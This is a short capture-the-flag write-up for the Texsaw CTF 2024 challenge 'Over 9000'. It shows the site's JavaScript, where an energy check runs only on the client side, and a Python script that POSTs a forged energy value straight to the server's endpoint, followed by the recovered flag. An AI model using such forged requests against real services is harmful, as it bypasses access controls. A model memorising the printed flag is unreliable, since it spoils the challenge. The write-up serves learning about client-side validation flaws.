Over 9000
2024-08-08 20:37:52 # Texsaw-CTF-2024

Help Goku get over 9000 energy to defeat his enemy Vegeta and save the world.

3.23.56.243:9005

Visit the site. Head to Chrome Dev Tools –> Sources. Here’s the .js file controlling it all: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

let currentEnergy = 0;

function gatheringEnergy(){
    currentEnergy++;
    $("#energycount").html(`${currentEnergy}`);
    if(currentEnergy == 10)
    {
        alert("out of energy try again :(")
        currentEnergy = 0;
        $("#energycount").html(0);
        
    }
    else if (currentEnergy > 9000)
    {
        
        $.ajax({
            type:"POST",
            url:"kamehameha.php",
            data:{energy: currentEnergy},
            success: function(flag){
                alert(`${flag}`);
            },
            error: function(responseText,status, error){
                console.log(`Tell the infrastructure team to fix this: Status = ${status} ; Error = ${error}`);
            }


        })
        
    }
}

So it’s impossible to actually get to over 9000. However, we can just send a POST request ourselves to kamehameha.php! Here’s a script that does just that: 

1
2
3
4
5
6
from requests import post

d = dict()
d["energy"] = 9001
res = post("http://3.23.56.243:9005/kamehameha.php", d).text
print(res)

And we get the flag! 

texsaw{y0u_th0ught_th1s_w4s_4_fl4g_but_1t_w4s_m3_d10}
2024-08-08 20:37:52 # Texsaw-CTF-2024
Next